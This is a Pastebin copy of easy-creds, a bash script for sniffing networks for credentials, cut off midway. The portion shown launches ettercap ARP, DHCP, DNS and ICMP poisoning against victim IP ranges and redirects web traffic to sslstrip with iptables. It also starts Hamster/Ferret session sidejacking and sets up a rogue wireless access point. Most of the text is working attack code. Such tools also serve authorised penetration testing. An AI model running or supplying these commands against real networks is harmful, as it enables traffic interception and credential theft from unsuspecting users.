Want more features on Pastebin? Sign Up, it's FREE!

kali_easy-creds.sh

By: zimmaro on Aug 14th, 2013  |  syntax: None  |  size: 56.00 KB  |  views: 144  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/bin/bash
  2.  
  3. ##################################################################################################################
  4. # easy-creds is a simple bash script which makes sniffing networks for credentials a little easier.              #
  5. #                                                                                                                #
  6. # J0hnnyBrav0 (@Brav0hax) & help from al14s (@al14s)                                                             #
  7. ##################################################################################################################
  8. # v3.7.3 Garden of Your Mind - 12/11/2012
  9. #
  10. # Copyright (C) 2012  Eric Milam
  11. # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
  12. # License as published by the Free Software Foundation; either version 2 of the License, or any later version.
  13. #
  14. # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
  15. # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  16. #
  17. # You should have received a copy of the GNU General Public License along with this program; if not, write to the
  18. # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
  19. ##################################################################################################################
  20. #
  21. #Clear some variables
  22. unset wireless
  23. unset etterlaunch
  24. unset offset
  25. unset eviltwin
  26. unset vercompare
  27. unset dosattack
  28. unset karmasploit
  29. unset x
  30. unset y
  31.  
  32. #Save the starting location path
  33. location=$PWD
  34.  
  35. #Find the ettercap version. Will be used for f_whichetter
  36. ettercapversion=$(ettercap -v|grep 2012|grep -o "0.7.4.2")
  37.  
  38. #Create the log folder in PWD
  39. if [ -z $1 ]; then
  40.         logfldr=$PWD/easy-creds-$(date +%F-%H%M)
  41.         mkdir -p $logfldr
  42. else
  43.         logfldr=$1
  44. fi
  45.  
  46. # Catch ctrl-c input from user
  47. trap f_Quit 2
  48.  
  49. #
  50. # MISCELLANEOUS FUNCTIONS
  51. #
  52. ##################################################
  53. f_isxrunning(){
  54.  
  55. # Check to see if X is running
  56. if [ -z $(pidof X) ] && [ -z $(pidof Xorg) ]; then
  57.         isxrunning=
  58. else
  59.         isxrunning=1
  60. fi
  61.  
  62. # Uncomment the following line to launch attacks in a screen session instead of an xterm window.
  63. #unset isxrunning
  64.  
  65. if [ -z $isxrunning ]; then
  66.         echo -e "\n\e[1;31m[-] X Windows not detected, your attack will be launched in screen\e[0m\n"
  67.         sleep 2
  68. fi
  69. }
  70.  
  71.  
  72. ##################################################
  73. f_findpaths(){
  74. # Grab the paths from the config file
  75. updatedb &> /dev/null
  76. easy_creds_config=$(locate easy-creds.paths)
  77. source $easy_creds_config      
  78. }
  79.  
  80. ##################################################
  81. f_xtermwindows(){
  82.         x="0"                                   # x offset value
  83.         y="0"                                   # y offset value
  84.         width="100"                             # width value
  85.         height="7"                              # height value
  86.         yoffset="120"                           # y offset
  87. }
  88.  
  89. ##################################################
  90. f_checkexit(){
  91.         if [ -z $clean ]; then
  92.                 f_Quit
  93.         else
  94.                 rm -rf /tmp/ec &> /dev/null
  95.                 clear
  96.                 exit 2> /dev/null
  97.         fi
  98. }
  99. ##################################################
  100. f_Quit(){
  101.         echo -e "\n\n\e[1;33m[*] Please standby while we clean up your mess...\e[0m\n"
  102.         sleep 3
  103.        
  104.         if [ -e /tmp/ec/sslstrip.pid ]; then kill $(cat /tmp/ec/sslstrip.pid); fi
  105.         if [ ! -z $(pidof hamster) ]; then kill $(pidof hamster); fi
  106.         if [ ! -z $(pidof ferret) ]; then kill $(pidof ferret); fi
  107.         if [ ! -z $(pidof ettercap) ]; then kill $(pidof ettercap); fi
  108.         if [ ! -z $(pidof urlsnarf) ]; then kill $(pidof urlsnarf); fi
  109.         if [ ! -z $(pidof dsniff) ]; then kill $(pidof dsniff); fi
  110.  
  111.         if [ ! -z $wireless ]; then
  112.          kill $(pidof airbase-ng) $(pidof hamster) $(pidof ferret)  $(cat /tmp/ec/tail.pid)
  113.          if [ -e /tmp/ec/sleep.pid ]; then kill $(cat /tmp/ec/sleep.pid); fi
  114.          service isc-dhcp-server stop &> /dev/null
  115.          iptables --flush
  116.          iptables --table nat --flush
  117.          iptables --delete-chain
  118.          iptables --table nat --delete-chain
  119.          #for $MONMODE in $(airmon-ng | grep mon | cut -f1); do   #stop 'em all
  120.                 airmon-ng stop $MONMODE &> /dev/null
  121.          #done
  122.         fi
  123.  
  124.         echo "0" > /proc/sys/net/ipv4/ip_forward
  125.  
  126.         if [ ! -z $dosattack ] ; then
  127.           airmon-ng stop $dosmon &> /dev/null
  128.           airmon-ng stop $airomon &> /dev/null
  129.         fi
  130.  
  131.         if [ ! -z $karmasploit ] ; then
  132.          kill $(cat /tmp/ec/ec-karma-pid) &> /dev/null
  133.          kill $(cat /tmp/ec/ec-metasploit-pid) &> /dev/null
  134.         fi
  135.  
  136.         if [ ! -z $fra ]; then
  137.          kill $(pidof radiusd) &> /dev/null
  138.          kill $(pidof hostapd) &> /dev/null
  139.          kill $(cat /tmp/ec/tail.pid) &> /dev/null
  140.          kill $(cat /tmp/ec/tshark.pid) &> /dev/null
  141.          mv $pathtoradiusconf/radiusd.conf.back $pathtoradiusconf/radiusd.conf
  142.          mv $pathtoradiusconf/clients.conf.back $pathtoradiusconf/clients.conf
  143.          echo "" > $freeradiuslog
  144.         fi
  145.  
  146.         if [ "$mainchoice" == "5" ]; then
  147.          clear
  148.          rm -rf /tmp/ec
  149.          exit 2> /dev/null
  150.         fi
  151.        
  152.         rm -rf /tmp/ec
  153.         bash $0 $logfldr
  154.         kill $$ 2> /dev/null
  155.         clean=1
  156. }
  157.  
  158.  
  159. ##################################################
  160. #
  161. # PREREQ AND CONFIGURATION FUNCTIONS
  162. #
  163. ##################################################
  164. f_addtunnel(){
  165.         if [ -z $isxrunning ];then
  166.                 if [ -e /etc/default/isc-dhcp-server ]; then
  167.                         nano /etc/default/isc-dhcp-server
  168.                 elif [ -e /etc/sysconfig/dhcpd ]; then
  169.                         nano /etc/sysconfig/dhcpd
  170.                 else
  171.                         nano /etc/default/isc-dhcp-server
  172.                 fi
  173.         else
  174.                 if [ -e /etc/default/isc-dhcp-server ]; then
  175.                         xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server &
  176.                 elif [ -e /etc/sysconfig/dhcpd ]; then
  177.                         xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/sysconfig/dhcpd &
  178.                 else
  179.                         xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server &
  180.                 fi
  181.  
  182.         fi
  183.         f_prereqs
  184. }
  185.  
  186.  
  187. ##################################################
  188. f_nanoetter(){
  189.         if [ -z $isxrunning ];then
  190.          nano /etc/etter.conf
  191.         else
  192.          xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter Conf" -e nano /etc/etter.conf &
  193.         fi
  194.         f_prereqs
  195. }
  196.  
  197.  
  198. ##################################################
  199. f_nanoetterdns(){
  200.         if [ -z $isxrunning ];then
  201.          nano /usr/local/share/ettercap/etter.dns
  202.         else
  203.          xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter DNS" -e nano /usr/local/share/ettercap/etter.dns &
  204.         fi
  205.         f_prereqs
  206. }
  207.  
  208.  
  209. ##################################################
  210. f_dhcp3install(){
  211.         clear
  212.         f_Banner
  213.  
  214.         echo -e "\e[1;33m[*] Installing dhcp-server, please stand by.\e[0m\n"
  215.         if [ -e /etc/lsb-release ] || [ -e /etc/issue ]; then
  216.          apt-get update &> /dev/null && apt-get install isc-dhcp-server &> /dev/null
  217.         elif [ -e /etc/redhat-release ]; then
  218.          yum install dhcp* &> /dev/null
  219.         else
  220.          echo -e "\e[1;31m[-] I can't determine your OS, please install isc-dhcp-server manually\e[0m"
  221.         fi
  222.         echo -e "\n\e[1;32m[+] Finished installing dhcp3-server.\e[0m\n"
  223.         sleep 3
  224.         f_prereqs
  225. }
  226.  
  227.  
  228. ##################################################
  229. f_karmareqs(){
  230.         clear
  231.         f_Banner
  232.  
  233.         echo -e "\e[1;33m[*] Installing Karmetasploit Prerequisites, please standby.\e[0m\n"
  234.         gem install activerecord
  235.         echo -e "\n\e[1;32m [+] Finished installing Karmetasploit Prerequisites.\e[0m\n"
  236.         sleep 3
  237.         f_prereqs
  238. }
  239.  
  240.  
  241. ##################################################
  242. f_msfupdate(){
  243.         clear
  244.         f_Banner
  245.  
  246.         echo -e "\e[1;33m[*] Updating the Metasploit Framework, please stand by.\e[0m\n"
  247.         msfupdate
  248.         echo -e "\n\e[1;32m [+] Finished updating the Metasploit Framework.\e[0m\n"
  249.         sleep 3
  250.         f_prereqs
  251. }
  252.  
  253.  
  254. ##################################################
  255. f_aircrackupdate(){
  256.         clear
  257.         f_Banner
  258.  
  259.         echo -e "\n\e[1;33m[*] Updating aircrack-ng from SVN, please be patient...\e[0m"
  260.         svn co http://trac.aircrack-ng.org/svn/trunk/ /tmp/ec/aircrack-ng
  261.         cd /tmp/ec/aircrack-ng/
  262.         make && make install > /dev/null
  263.         echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n"
  264.         sleep 2
  265.         echo -e "\e[1;33m[*] Updating airodump-ng OUI.\e[0m\n"
  266.         bash $airodumppath/airodump-ng-oui-update > /dev/null
  267.         echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n"
  268.         sleep 3
  269.  
  270.         cd $location
  271.         f_prereqs
  272. }
  273.  
  274.  
  275. ##################################################
  276. f_sslstrip_vercheck(){
  277.         clear
  278.         f_Banner
  279.         echo -e "\n\e[1;33m[*] Checking the thoughtcrime website for the latest version of SSLStrip...\e[0m\n"
  280.  
  281.         #Get the installed version
  282.         echo cat $sslstrippath/setup.py|grep version|cut -d "'" -f2
  283.         installedver=$(cat $sslstrippath/setup.py|grep version|cut -d "'" -f2)
  284.  
  285.         # Change to tmp folder to keep things clean then get the index.html from thoughtcrime.com for SSLStrip
  286.         cd /tmp/ec
  287.         wget -q http://www.thoughtcrime.org/software/sslstrip/index.html
  288.         latestver=$(cat index.html | grep "cd sslstrip"| cut -d "-" -f2|cut -d "<" -f1)
  289.         cd $location
  290.  
  291.         echo -e "\n\e[1;33m[*] Installed version of SSLStrip: $installedver\e[0m\n"
  292.         echo -e "\nLatest version of SSLStrip: $latestver\n"
  293.  
  294.         if [ $(echo "$installedver < $latestver"|bc) == "1" ]; then
  295.           echo -e "\n\e[1;33m[*] You have version\e[0m \e[1;31m$installedver\e[0m \e[1;33m installed, version\e[0m \e[1;32m$latestver\e[0m \e[1;33m is available.\e[0m\n"
  296.  
  297.           read -p "Would you like to install the latest version? [y/N]: " yn
  298.           if [ $(echo ${yn} | tr 'A-Z' 'a-z') == 'y' ]; then f_sslstripupdate; fi
  299.         else
  300.           echo -e "\n\e[1;32m[+] Looks like you're running the latest version available.\e[0m \n"
  301.           sleep 3
  302.         fi
  303.         f_prereqs
  304. }
  305.  
  306.  
  307. ##################################################
  308. f_sslstripupdate(){
  309.         clear
  310.         f_Banner
  311.  
  312.         echo -e "\n\e[1;31m[-] This will install SSLStrip from the thoughtcrime website, not the repositories.\e[0m\n\e[1;33m[*] Hit return to continue or ctrl-c to cancel and return to main menu.\e[0"
  313.         read
  314.  
  315.         cp -R "$sslstrippath" /tmp/ec/sslstrip-$installedver
  316.  
  317.         echo -e "\n\e[1;33m[*] Downloading the tar file...\e[0m"
  318.         cd /tmp/ec/
  319.         wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-$latestver.tar.gz
  320.  
  321.         echo -e "\n\e[1;33m[*] Installing the latest version of SSLStrip...\e[0m"
  322.         tar -xvf sslstrip-$latestver.tar.gz
  323.         mv -f /tmp/ec/sslstrip-$latestver $sslstrippath/sslstrip
  324.         python $sslstrippath/setup.py install &> /dev/null
  325.         cd $location
  326.  
  327.         echo -e "\n\e[1;32m[+] Version $latestver has been installed.\e[0m\n"
  328.         sleep 2
  329. }
  330. ##################################################
  331. f_howtos(){
  332.         xdg-open http://www.youtube.com/user/Brav0Hax/videos &
  333.         f_prereqs
  334. }
  335. ##################################################
  336. f_pbs(){
  337.         xdg-open http://www.youtube.com/watch?v=OFzXaFbxDcM &
  338.         f_mainmenu
  339. }
  340. ##################################################
  341. #
  342. # POISONING ATTACK FUNCTIONS
  343. #
  344. ##################################################
  345. f_getvics(){
  346.         read -p "Do you have a populated file of victims to use? [y/N]: " VICFILE
  347.  
  348.         if [ "$(echo ${VICFILE} | tr 'A-Z' 'a-z')" == "y" ]; then
  349.                 VICLIST=
  350.                 p=
  351.                 if [ -e /tmp/victims ]; then p="[/tmp/victims]"; fi
  352.                 while [ -z $VICLIST ]; do
  353.                         read -e -p "Path to the victim list file $p : " VICLIST
  354.                         if [ -z $VICLIST ] && [ -n $p ]; then VICLIST="/tmp/victims"; fi
  355.                 done
  356.         else
  357.                 VICS=
  358.                 while [ -z $VICS ]; do read -p "IP address or range of IPs to poison (ettercap format): " VICS; done
  359.         fi
  360.         GW=
  361.         p=$(route | grep default | awk '{print $2}')
  362.         while [ -z $GW ]; do
  363.          read -p "IP address of the gateway [$p] : " GW
  364.          if [ -z $GW ];then GW=$p; fi
  365.         done
  366.         f_whichettercap
  367. }
  368.  
  369.  
  370. ##################################################
  371. f_whichettercap(){
  372.  
  373.         if [ "$VICFILE" == "y" ]; then
  374.          case $poisoningchoice in
  375.            2) etterlaunch=1 ;;
  376.            3) etterlaunch=3 ;;
  377.            5) etterlaunch=8 ;;
  378.          esac
  379.         else
  380.          case $poisoningchoice in
  381.            2) etterlaunch=2 ;;
  382.            3) etterlaunch=4 ;;
  383.            5) etterlaunch=9 ;;
  384.          esac
  385.         fi
  386. }
  387.  
  388.  
  389. ##################################################
  390. f_HostScan(){
  391.         clear
  392.         f_Banner
  393.  
  394.         range=
  395.         while [ -z "$range" ]; do read -p "Enter your target network range (nmap format): " range; done
  396.  
  397.         echo -e "Performing an ARP scan to identify live devices - excluding our IPs.\n\nThis may take a bit.\n"
  398.  
  399.         #take our addresses out of the mix  ;)
  400.         myaddrs=$(printf "%s," $(ifconfig | grep "inet" | grep -v "127.0.0.1" | awk '{print $2}' | sed 's/addr://g'))
  401.  
  402.         nmap -PR -n -sn $range --exclude $myaddrs -oN /tmp/ec/nmap.scan
  403.  
  404.         grep -e report -e MAC /tmp/ec/nmap.scan | sed '{ N; s/\n/ /; s/Nmap scan report for //g; s/MAC Address: //g; s/ (.\+//g; s/$/ -/; }' > /tmp/victims
  405.  
  406.         echo -e "\n\e[1;33m[*] Your victim host list is at /tmp/victims.\e[0m\n"
  407.         echo -e "\n\e[1;31m[-] Remember to remove any IPs that should not be poisoned!\e[0m\n"
  408.  
  409.         read -p "Would you like to edit the victim host list? [y/N] : " yn
  410.         if [ $(echo $yn | tr 'A-Z' 'a-z') == "y" ]; then
  411.                 if [ -z $isxrunning ];then
  412.                  nano /tmp/victims
  413.                 else
  414.                  xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Victims List" -e nano /tmp/victims &
  415.                 fi
  416.         fi
  417.         f_poisoning
  418. }
  419.  
  420.  
  421. ##################################################
  422. f_setup(){
  423.         echo -e "Network Interfaces:\n"
  424.         ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
  425.  
  426.         IFACE=
  427.         while [ -z $IFACE ]; do
  428.          read -p "Interface connected to the network (ex. eth0): " IFACE
  429.         done
  430.  
  431.         echo -e "\n\n\e[1;33m[*] Setting up iptables to handle traffic routing...\e[0m\n"
  432.         iptables --flush
  433.         iptables --table nat --flush
  434.         iptables --delete-chain
  435.         iptables --table nat --delete-chain
  436.         iptables -P FORWARD ACCEPT
  437.         iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
  438.         iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  439.         sleep 3
  440.  
  441.         f_xtermwindows
  442. }
  443.  
  444.  
  445. ##################################################
  446. f_Standard(){
  447.         clear
  448.         f_Banner
  449.         f_setup
  450.         f_getvics
  451.         f_finalstage
  452.         f_mainmenu
  453. }
  454.  
  455.  
  456. ##################################################
  457. f_Oneway(){
  458.         clear
  459.         f_Banner
  460.         f_setup
  461.         f_getvics
  462.         f_finalstage
  463.         f_mainmenu
  464. }
  465.  
  466.  
  467. ##################################################
  468. f_DHCPPoison(){
  469.         clear
  470.         f_Banner
  471.         f_setup
  472.         etterlaunch=5
  473.  
  474.         POOL=
  475.         while [ -z "$POOL" ]; do read -p "Pool of IP address to assign to your victims: " POOL; done
  476.         MASK=
  477.         while [ -z "$MASK" ]; do read -p "Netmask to assign to your victims: " MASK; done
  478.         DNS=
  479.         while [ -z "$DNS" ]; do read -p "DNS IP to assign to your victims: " DNS; done
  480.  
  481.         f_finalstage
  482.         f_mainmenu
  483. }
  484.  
  485.  
  486. ##################################################
  487. f_DNSPoison(){
  488.         clear
  489.         f_Banner
  490.         f_setup
  491.         f_getvics
  492.         f_finalstage
  493.         f_mainmenu
  494. }
  495.  
  496.  
  497. ##################################################
  498. f_ICMPPoison(){
  499.         clear
  500.         f_Banner
  501.         f_setup
  502.         etterlaunch=6
  503.  
  504.         GATEMAC=
  505.         while [ -z "$GATEMAC" ]; do read -p "MAC address of the gateway: " GATEMAC; done
  506.         GATEIP=
  507.         while [ -z "$GATEIP" ]; do read -p "IP address of the gateway: " GATEIP; done
  508.  
  509.         f_finalstage
  510.         f_mainmenu
  511. }
  512.  
  513.  
  514. ##################################################
  515. f_sidejack(){
  516.         echo -e "\n\e[1;33m[*] Starting Hamster & Ferret...\e[0m\n"
  517.         cd $logfldr
  518.         screen -dmS SideJack -t ferret bash -c "$ferretpath/ferret -i $IFACE"
  519.         sleep 2
  520.         screen -S SideJack -t hamster -X screen $hamsterpath/hamster
  521.         cd $location
  522.         sleep 2
  523.         echo -e "\n\e[1;33m[*] Run firefox and type http://hamster\e[0m\n"
  524.         echo -e "\e[1;33m[*] Don't forget to set the proxy to 127.0.0.1:1234\e[0m\n"
  525.         sleep 5
  526. }
  527.  
  528.  
  529. ##################################################
  530. f_ecap(){
  531.         echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n"
  532.         y=$(($y+$yoffset))
  533.  
  534.         case $etterlaunch in
  535.         1) type="[arp:remote]"
  536.            c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;;
  537.         2) type="[arp:remote]"
  538.            c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;;
  539.         3) type="[arp:oneway]"
  540.            c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE // /$GW/" ;;
  541.         4) type="[arp:oneway]"
  542.            c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS/ /$GW/" ;;
  543.         5) type="[dhcp:$POOL/$MASK/$DNS/]"
  544.            c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;;
  545.         6) type="[icmp:$GATEMAC/$GATEIP]"
  546.            c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;;
  547.         7) type="[tunnel]"
  548.            c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE // //" ;;
  549.         8) type="[dns_spoof / arp]"
  550.            c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;;
  551.         9) type="[dns_spoof / arp]"
  552.            c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;;
  553.         esac
  554.  
  555.         if [ ! -z $isxrunning ]; then
  556.            xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c &
  557.         else
  558.            screen -S easy-creds -t ettercap -X screen $c
  559.         fi
  560.         ecpid=$(pidof ettercap)
  561. }
  562.  
  563.  
  564. ##################################################
  565. f_ecap_assimilation(){
  566.         #Used if version of ettercap is 0.7.5 and above. Target specification format changed for IPv6
  567.        
  568.         echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n"
  569.         y=$(($y+$yoffset))
  570.  
  571.         case $etterlaunch in
  572.         1) type="[arp:remote]"
  573.            c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;;
  574.         2) type="[arp:remote]"
  575.            c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;;
  576.         3) type="[arp:oneway]"
  577.            c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /// /$GW//" ;;
  578.         4) type="[arp:oneway]"
  579.            c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS// /$GW//" ;;
  580.         5) type="[dhcp:$POOL/$MASK/$DNS/]"
  581.            c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;;
  582.         6) type="[icmp:$GATEMAC/$GATEIP]"
  583.            c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;;
  584.         7) type="[tunnel]"
  585.            c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE /// ///" ;;
  586.         8) type="[dns_spoof / arp]"
  587.            c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;;
  588.         9) type="[dns_spoof / arp]"
  589.            c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;;
  590.         esac
  591.  
  592.         if [ ! -z $isxrunning ]; then
  593.            xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c &
  594.         else
  595.            screen -S easy-creds -t ettercap -X screen $c
  596.         fi
  597.         ecpid=$(pidof ettercap)
  598. }
  599.  
  600. ##################################################
  601. #
  602. # FAKE AP ATTACK FUNCTIONS
  603. #
  604. ##################################################
  605. f_fakeapAttack(){
  606.  
  607.         wireless=1
  608.         offset=1
  609.  
  610.         # Credit to Lucafa's post on the Offensive-Security forums, used as a base
  611.         clear
  612.         f_Banner
  613.         f_xtermwindows
  614.  
  615.         SIDEJACK=
  616.            read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK
  617.            SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')"
  618.  
  619.         echo -e "Network Interfaces:\n"
  620.         ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
  621.  
  622.         IFACE=
  623.         while [ -z "$IFACE" ]; do read -p "Interface connected to the internet (ex. eth0): " IFACE; done
  624.  
  625.         wirelesscheck=$(airmon-ng | grep 'wlan')
  626.  
  627.         if [ ! -z "$wirelesscheck" ]; then
  628.          airmon-ng
  629.         else
  630.          echo -e "\n\e[1;31m[-] I can't find a wireless interface to display...continuing anyway\e[0m\n"
  631.          sleep 5
  632.         fi
  633.  
  634.         WIFACE=
  635.         while [ -z "$WIFACE" ]; do read -p "Wireless interface name (ex. wlan0): " WIFACE; done
  636.  
  637.         if [ -z $eviltwin ]; then
  638.                 ESSID=
  639.                 while [ -z "$ESSID" ]; do read -p "ESSID you would like your rogue AP to be called, example FreeWiFi: " ESSID; done
  640.                 CHAN=
  641.                 while [ -z "$CHAN" ]; do read -p "Channel you would like to broadcast on: " CHAN; done
  642.                 airmon-ng start $WIFACE $CHAN &> /dev/null
  643.         elif [ "$eviltwin" == "1" ]; then
  644.           airmon-ng start $WIFACE &> /dev/null
  645.         fi
  646.  
  647.         modprobe tun
  648.  
  649.         echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n"
  650.         airmon-ng | grep mon | sed '$a\\n'
  651.         MONMODE=
  652.         while [ -z "$MONMODE" ]; do read -p "Enter your monitor enabled interface name, (ex: mon0): " MONMODE; done
  653.         TUNIFACE=
  654.         while [ -z "$TUNIFACE" ]; do read -p "Enter your tunnel interface, example at0: " TUNIFACE; done
  655.  
  656.         read -p "Do you have a dhcpd.conf file to use? [y/N]: " DHCPFILE
  657.         DHCPFILE=$(echo $DHCPFILE | tr 'A-Z' 'a-z')
  658.  
  659.         if [ "$DHCPFILE" == "y" ]; then
  660.           f_dhcpconf
  661.         else
  662.           f_dhcpmanual
  663.         fi
  664.  
  665.         f_dhcptunnel
  666. }
  667.  
  668.  
  669. ##################################################
  670. f_dhcpconf(){
  671.        
  672.         dhcpdconf=
  673.         if [ -d /etc/dhcp]; then #Ubuntu/Debian dhcp3-server
  674.                 dhcpdconf="/etc/dhcp/dhcpd.conf"
  675.         elif [ -e /etc/dhcpd.conf ]; then #redhat/fedora old
  676.                 dhcpdconf="/etc/dhcpd.conf"
  677.         else
  678.                 dhcpdconf="/etc/dhcp/dhcpd.conf" #Ubuntu/Debian/RH/Fedora isc-dhcp-server
  679.         fi
  680.        
  681.         valid=
  682.         while [[ $valid != 1 ]]; do
  683.          read -e -p "Path to the dhcpd.conf file [$dhcpdconf]: " DHCPPATH
  684.          if [ -z "$DHCPPATH" ]; then DHCPPATH=$dhcpdconf; fi
  685.          
  686.         if [ ! -f "$DHCPPATH" ]; then
  687.                 echo -e "File not found - $DHCPPATH\n"
  688.          else
  689.                 valid=1
  690.          fi
  691.         done
  692.  
  693.         cat $DHCPPATH > /tmp/ec/dhcpd.conf
  694.         mv /tmp/ec/dhcpd.conf $dhcpdconf
  695.         DHCPPATH=$dhcpdconf
  696.  
  697.         #If your DHCP conf file is setup properly, this will work, otherwise you need to tweak it
  698.         ATNET=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f2)
  699.         ATIP=$(cat $DHCPPATH |grep -i "option routers"|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
  700.         ATSUB=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f4)
  701.         ATCIDR=$(ipcalc -b $ATNET/$ATSUB|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\/[0-9]\{1,2\}')
  702.  
  703. }
  704.  
  705.  
  706. ##################################################
  707. f_ipcalc(){
  708.        
  709.         dhcpdconf=
  710.         if [ -d /etc/dhcp ]; then
  711.                 dhcpdconf="/etc/dhcp/dhcpd.conf"
  712.         elif [ -e /etc/sysconfig/dhcpd ]; then
  713.                 dhcpdconf="/etc/dhcpd.conf"
  714.         else
  715.                 dhcpdconf="/etc/dhcp/dhcp.conf"
  716.         fi
  717.        
  718.         DHCPPATH=$dhcpdconf
  719.  
  720.         #use ipcalc to complete the DHCP setup
  721.         ipcalc "$ATCIDR" > /tmp/ec/atcidr
  722.         ATNET=$(cat /tmp/ec/atcidr|grep Address| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
  723.         ATIP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
  724.         ATSUB=$(cat /tmp/ec/atcidr|grep Netmask| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
  725.         ATBROAD=$(cat /tmp/ec/atcidr|grep Broadcast| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
  726.         ATLSTARTTMP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3)
  727.         ATLSTART=$(echo $ATLSTARTTMP.100)
  728.         ATLENDTMP=$(cat /tmp/ec/atcidr|grep HostMax| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3)
  729.         ATLEND=$(echo $ATLENDTMP.200)
  730.  
  731.         echo -e "\n\n\e[1;33m[*] Creating a dhcpd.conf to assign addresses to clients that connect to us.\e[0m"
  732.         echo "ddns-update-style none;" > $DHCPPATH
  733.         echo "authoritative;"  >> $DHCPPATH
  734.         echo "log-facility local7;"  >> $DHCPPATH
